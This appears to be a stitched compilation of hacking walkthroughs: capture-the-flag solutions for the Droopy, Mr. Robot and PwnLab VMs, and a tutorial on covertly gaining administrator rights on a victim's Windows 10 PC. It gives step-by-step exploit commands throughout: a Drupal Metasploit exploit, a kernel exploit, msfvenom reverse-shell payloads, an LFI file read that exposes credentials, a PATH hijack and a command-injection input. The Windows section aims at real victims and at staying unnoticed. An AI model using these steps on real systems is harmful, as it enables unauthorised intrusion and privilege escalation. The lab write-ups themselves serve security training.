Hack the Droopy VM (CTF Challenge)

Droopy Walkthrough

In this article we will complete a challenge of Capture the Flag series. This is Walkthrough of Droopy VM which is a vulnerable framework but it is little bit complex too. Download it from –> Here

Walkthrough

Let us start by scanning the network so that we can know the IP of our target. And to scan the network types the following:

netdiscover

So by using the above command we know our target IP is 192.168.1.102. Now that we know our target IP, lets study it more by using nmap :

nmap -p- -A 192.168.1.102

Here,

-p-  à is for port by port search

-A à is for an thorough search

By using nmap we fing that port no. 80 isi the only one that is opened. So therefore, lets fire up the IP in the browser.

By studying the webpage we get to know that the website has been made in drupal CMS. And we all know that there is an very effective exploit for it in Metasploit and to use that type :

use exploit/multi/http/drupal_drupageddon

 once the exploit starts working, it will ask you for rhost which you set by following command and then runt he exploit.

set rhost 192.168.1.102

exploit

As the exploits runs, you will have your meterpreter session. Type sysinfo as the first command to gather information about the target. This way we come to know that the OS used by target is linux with the version of 3.13.0, this version of linux has its own exploit which you can find on www.exploit-db.com. Once you find the exploit there, download it and then type the following command in the terminal of kali :

searchsploit 3.13.0

Go to the /tmp folder by typing cd /tmp and upload the exploit there by typing :

upload /root/Desktop/37292.c

Oncethe exploit is uploaded, got o shell by simply giving shell command. And then type :

python -c ‘import pty;pty.spawn(“/bin/bash”)’

And then type the following command to compile the exploit :

gcc 37292.c -o shell

once the exploit is compiled give the permissions to shell :

chmod 777 shell

and then run the ./shell command for your exploit to work. This is the exploit for privilege escalation so when this exploit runs, you will have your privilege to the VM.

After this check you id by simply typing id.  It shows that you are the root. So lets jump to the folder root by typing cd /root and then type ls to check the file inside the root folder. And here we have one file in the root. Lets copy it to var/www/html so we can open the file in the browser :

cp dave.tc /var/www/html

Now lets open the file in the browser by typing :

192.168.1.102/dave.tc

And then we will go into the /var by typing cd /var and then type ls to view its content. Now lets go into mail by typing cd mail and then ls to view its content. And the type  cat www-data to read whatever’s inside it.

In www-data we find a mail. This mail gives us two hints about the password that we need i.e. we will find our password in the rockyou wordlist and password contain prefix or suffix “academy”. So we will take all the words from rockyou wordlist that has acadaemy in it and make a different wordlist with all the possible passwords. And for this type :

Cat rockyou.txt | grep academy > /root/Desktop/dict.txt

Now from the wordlist, that we just created, we will apply dictionary attack to have our password. And so for this type :

truecrack –truecrypt /root/Downloads/dave.tc -k SHA512 -w /root/Desktop/dict.txt

Now using veracrypt we can decrypt the file.

To decrypt the file enter the password that we just found.

Once it opens you can see all of its content.

Following are the folders you will find in it.

Open its path in the terminal of kali and type ls -la to view the files. Open secret by typing cd .secret and the type ls -la to see its content. And then open .top by typing cd .top and then type ls -la to see all the files in it. There you will find flag.txt, type cat flag.txt to view the flag.

And yippiiee!!! We found our flag. 😊

Hack Admin Access of Remote Windows 10 PC using TpmInitUACBypass

Microsoft is increasing its security with the evolution of their windows. And with that it is getting more and more difficult to hack them. It is often said "where there is will; there is a way", threfore thankfully it is not impossible to do so. Once you have hacked into WIndows 10 PC then it is difficult to gain it administrator access without getting your victim suspicious. Therefore, we present you a new way to do so.

Move along with following steps and you will learn how to gain administrator access of windows 10 PC without the Victim's suspicion.

First of all, to learn to how to hack victim's PC click here.

After hacking when you have gained a meterpreter session then type :

getsystem

using this command you will confirm the fact that you have not entered the administrator yet. So now, there is no need to worry. Just download this Tpinit file from --> here

And now upload the said file into victim's PC by typing :

upload /root/Desktop/TpmIniyUACBypass.exe d:\\

Here,

upload --> is use to upload a file

/root/Desktop/TpmIniyUACBypass.exe --> is the path of the file that is to be uploaded

d:\\ --> is location of where the file will be uploaded in victim's PC

As the file is uploaded, open metasploit simultaneously and type :

use exploit/multi/handler

set payload windows/x64/meterpreter/reverse_tcp

set lhost 102.168.0.106

set lport 443

exploit

Once this exploit is executed. go to the meterpreter session that you previously had and type :

shell

Typing shell will take you to the shell of the PC. Now further type :

d: (This command will take into the D Drive of victim's PC i.e where you upload your file)

TpmInitUACBypass.exe 192.168.0.106 msf (This command will execute your uploaded file)

As the command will make our file execute we will have a session with administrator privileges as shown

Hack the Mr. Robot VM (CTF Challenge)

his is our another article of root2boot penetration testing challenge. We will walk through a exploitable framework Mr. Robot. It is based on the TV show, Mr. Robot, it has three keys hidden in different locations. The main goal is to find all three tokens hidden in the system. Each key is progressively difficult to find. Breaking into it isn’t too difficult. There isn’t any advanced exploitation or reverse engineering. The level is considered beginner-intermediate.

First Download the Mr Robot Lab from here

Penetrating Methodology:

·         Network Scanning (Nmap, netdiscover)

·         Recon (Nikto)

·         Use robot.txt

·         Grab 1st key

·         Download fsocity.dic file and use as dictionary

·         Wordpress password cracking (wpscan)

·         Login into Wordpress

·         Generate PHP Backdoor (Msfvenom)

·         Upload and execute a backdoor

·         Reverse connection (Metasploit)

·         Get MD5 hash and decrypt it

·         Import python one-liner for proper TTY shell

·         Find / perm u=s for Privilege Escalation

·         Get Root access and capture the flag.

First of all we have to find its IP address and for that go to the terminal of your Kali and type :

netdiscover

Upon the execution of the above command we will know about all the IP addresses in our network. Our target IP is 192.168.1.103, let us scan it.

To scan our target IP we will use aggressive scan (-A)

nmap -p- -A 192.168.1.103

The scan’s result shows us the open ports are: 22, 80, and 443. As the 80 port is open we can try and open this IP in our browser.

And yes, it opens which further confirms our target.

Next we will apply nikto command to it. Nitko command will help us to gather information like its files and all the other major stuff that we ought to know about our target. So, therefore, type:

nitko -h 192.168.1.103

From the result we can gather that there a text file with the name of robots.txt which might provide us with some further information. Moreover it also tell us that wordpress installation was found.

So now let us try to open robots.txt in the browser. Yesssssssss!! It gave something to us let open each file one-by-one.

Excellent!!! Inside key-1-of-3.txt we found our 1^st key.

Now open fsocity.dic file in browser which is a dictionary file. Let us first try and open this dictionary file the browser. Once we open the said dictionary file in the browser, it asks us to download it. Going ahead we downloaded and opened it. It is a file which may contains username or passwords.

So now we know that we might have username or passwords, we will try and logon into our target. One by one we have tried every username and it has given the error that the username doesn’t exist.  But when we used the name elliot it gave us the error that the password is empty.

With this we know one thing for sure that elliot is a correct username and now we just have to find a password for it.

Our best guess to find the password the same dictionary file from which we found the username. Thus, moving forward we will use WPScan to find our password from the same file.

wpscan -u http://192.168.1.103/--username Elliot --wordlist /root/Desktop/fsocity.dic

When the execution is completed (which may time much time as in our case it took almost 4 hours) you will have the password for the username elliot which is ER28-0652.

Using the password, logon in to the wordpress and open 404 template to add a new theme.

One you have logged in, make the malicious file that you got to upload in it. Generate code through msfvenom command:

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.108 lport=4444 -f raw

On other hand run multi/handler inside Metasploit framework.

Copy the code from  to die(); and paste it on template(and save it)

Now you have access to a WordPress admin console is to replace one of the theme templates with some PHP of your own. I decided to try for a reverse shell by editing the 404.php theme and replacing the contents with the msfvenom generated shell.

Once the php code is saved, then, open the path of the template in the browser as shown:

Browsing to http://192.168.1.103/wp-content/themes/twentyfifteen/404.php and press enter

Meanwhile, return to the Metasploit terminal and wait for the metepreter session by exploiting multi handler.

msf use exploit/multi/handler

msf exploit(multi/handler) set payload php/meterpreter/reverse_tcp

msf exploit(multi/handler) set lhost 192.168.1.108

msf exploit(multi/handler) set lport 4444

msf exploit(multi/handler) exploit

From given below image you can observe Meterpreter session 1. But task is not finished yet, still we need to penetrate more for privilege escalation.

cd home

ls

Now, to know the information about the robot folder/file we will type:

We now know that there are two important files, one of them is a text file other is password in the form of MD5. If we try to open the text file by typing:

cat key-2-of-3.txt

It will not open as we do not have the permission to do so. But now let us try and open the MD5 file and for that type:

cat password.raw-md5

Executing the above command will give a MD5 value (hash value) of the password as you can see below:

We will use md5 online decrypting tool for cracking this MD5 value. Enter the MD5 value in to the hash box and obtain the result. The value will translate to abcdefghijklmnopqrstuvwxyz as shown below.

Then to access proper TTY shell we had import python one line script by typing following:

Shell

python -c 'import pty;pty.spawn("/bin/bash")'

Now in the terminal try to switch the user to robot by the command:

su robot

Following the command it will ask you for the password. Enter the MD5 cracked password here and you will enter the robot user and to gain its information type:

ls

Now, try to open the remaining text file by typing:

cat key-2-of-3.txt

Here I will read the second key file

Now let’s find out all those files having root privilege by using following command.

find / -perm -u=s -type f 2>/dev/null

It has shown so many binary files but I was interested in nmap from its output result.

Nmap supported an option called “interactive.” With this option, users were able to execute shell commands by using an nmap “shell” (interactive shell). 

Next type the following:

nmap --interactive

With the above commands you will enter nmap then type:

!sh

id (to know the users)

cd /root (lets you to enter root)

Once you have entered the root, type:

ls -lsa

cat key-3-of-3.txt

And upon the execution of we will obtain 3 of 3 keys, hence entering Mr. Robot. There are many ways to perform the above but this methods is the easiest. We hope you find it effective and interesting and it helps you to improve.

Penetration Testing in PwnLab (CTF Challenge)

In this article, we will walkthrough a root2boot penetration testing challenge i.e PwnLab. PwbLab is a vulnerable framework, based on the concept of CTF (capture the flag), with a bit of security which is a little complicated to bypass. But it's not impossible. So, let us learn how we can get its access.

Download From Here

Penetrating Methodology:

Network Scanning (Nmap, netdiscover)

Information Gathering (Nikto)

Abusing config.php file (curl & PHP filter convert)

Obtain Mysql Database credential

Extract user credential from Mysql Database

Login to web application

Upload webshell (PHP reverse shell)

Executing Uploaded PHP backdoor (Burp suit)

Netcat session

Import python one-liner for proper TTY shell

Find SUID Binaries

Privilege Escalation by Manipulating $PATH

Get Root access and capture the flag.

Let’s Start!!!

Now to start let us, firstly, consider that we do not know the IP of the PwnLab, therefore search for the IP address beforehand and for that there is a command that shows us all the IP's present in our network, so go to the terminal of you Kali and type :

netdiscover

Target IP = 192.168.1.103

And to know that we start our penetration testing. So, first, we will now scan with nmap, we will apply an aggressive scan as it gives detailed information and is fast. The command is :

nmap -A 192.168.1.13

We have the result of scanning and as you can see there are only three ports open and they are 80, 111, 3306. It is our best shot but also to be sure let us check this IP on our browser. In the browser, we can see that PwnLab has three pages: home, login and upload. To enter the server we have to upload our code into it and for we must know username and password.

As we need to know about username and password, we will use nikto command to find out the file which is storing them. Nikto helps us to know all the file names and the data they are containing. And the command to for this is:
nikto -h http://192.168.1.103
As you can see /config.php: PHP Config file may contain database IDs and password is the file that has username and passwords. Moreover, login.php for admin login page is found.

So when we open target IP on the browser and explore Login tab then it gives login form as shown below. As we were unaware of its login credential thus we try SQL injection techniques but nothing was useful now the last options was to use CURL. If you will observe the URL http://192.168.1.103/?page=login then you can count that its look like that LFI.

But it was not easy that much to exact information by exploiting LFI with help of ../etc/password therefore by making little bit more effort and taking help from my previous article we used curl command to find out the data from inside config.php file with the help of PHP base64-encode.

curl http://192.168.1.103/index.php?page=php://filter/convert.base64-encode/resource=config

And the highlighted part of the above image is our result and has the information about username and passwords. But note that the information is in base64 code which we will have to decode in order to read it. In order to decode copy the base 64 text and follow below syntax.

echo ‘base 64 encoded text’ | base64 -d

Thus we found the following information after decoding.

$server   = "localhost";

$username = "root";

$password = "H4u%QJ_H99";

$database = "Users";

So, the username is root and password is H4u%QJ_H99.

Now we use MySQL command to see the username and passwords. And the lSQL command is:

mysql -h 192.168.1.103 -u root -p Users

After typing the command it asks the password, so here enter the decoded password and press enter.

kent | Sld6WHVCSkpOeQ

mike | U0lmZHNURW42SQ

kane | aVN2NVltMkdSbw

And so, you will have the usernames and password as in this case the usernames are kent, mike, Kane with their passwords in base64 code.

To decode each password follow the same method using echo command with -d option as shown and thus you will decode the password.

Kent: JWzXuBJJNy

Mike: SIfdsTEn6I

Kane:  Sv5Ym2GRo

By using Kane credential, we login successfully, with help of upload option we can upload any image.

Here, upload option is like a dynamic opportunity for us, because through this we can upload any backdoor file for reverse connections. We know that in Kali Linux there are several PHP backdoors among those we have used usr/share/webshell/php/php-reverse-shell. BUT you need to modify it by adding GIF98 and save as shell.gif because here you can able to upload only a file with extension GIF, png and img.

After changing the extension when you will try to upload the file you will succeed. Now the uploaded file must be executed at once to achieve reverse connection. Once the file is uploaded, we still need a way to execute this file. And for that right click on that file and click on copy image location option. Further open a new terminal to start Netcat listen for the reverse connection.

nc -lvp 1234

Now capture its HTTP request inside burp suit or tamper data. Here its shows that the “lang” parameter is set as a cookie and might be it could use for our malicious file execution. Inside the cookie option delete whatever was written and type:

lang=../*Image location path*

Here,

*image location path* is the path of the file that you uploaded and had copied it after that.

Once above said changes are done then forward the intercepted request and open the terminal where netcat listener was activated here you will find the reverse connection of victim's machine. To access proper tty shell execute below command, start penetrating more to get the flag.

python -c 'import pty; pty.spawn("/bin/sh")'

cd /home

ls

su kane

iSv5Ym2GRo

Here,

su –> denotes the switch user

kane –> the user you want to switch to

iSv5Ym2GRo –> is the password

Next, if you type ls command you will that there is a folder named home in the user that we just entered. So, will go into that folder and to do so, type;

cd home

 ls

cd kane

ls

Then by using the following command, you can enumerate all binaries having SUID permission.

find / -perm -u=s -type f 2>/dev/null

As you can see in the image below, there is a file in Kane user called msgmike.  Let us try to open it and therefore, type :

./msgmike

So we will try to run msgmike file, it put up an error message "cat: /home/mike/msg.txt No such file or directory" 

The most important things which should be considered here that the author has set SUID bit ON for msgmike file and might be there could be any small program file which is calling system binaries such cat to a read file from inside given path i.e. /home/mike/msg.txt  but the cat fails to find msg.txt file or directory. Taking its advantage, we will try to manipulate the environment PATH variable for cat to execute our /bin/bash command under user Mike.

To do this follow below steps:

echo $PATH

echo ‘/bin/sh’ > cat

chmod 777 cat

export PATH=./:$PATH

Now again run msgmike file and you will get user Mike access. Hence above all steps was performed in direction of privilege escalation for user Mike but the root escalation is connected to phase indirectly as mike has a file msg2root which will take any Input command as the message to root.

cd mike

ls

So when you will run the msg2root file, it will ask you enter the message for root which will be considered as an input value and you can utilize this opportunity for privilege escalation as shown.

./msg2root

test; /bin/sh

id

cd /root

cat flagt.txt

HURRAYYYYYYYYYYYYY!! We hit the Goal and solved this challenges.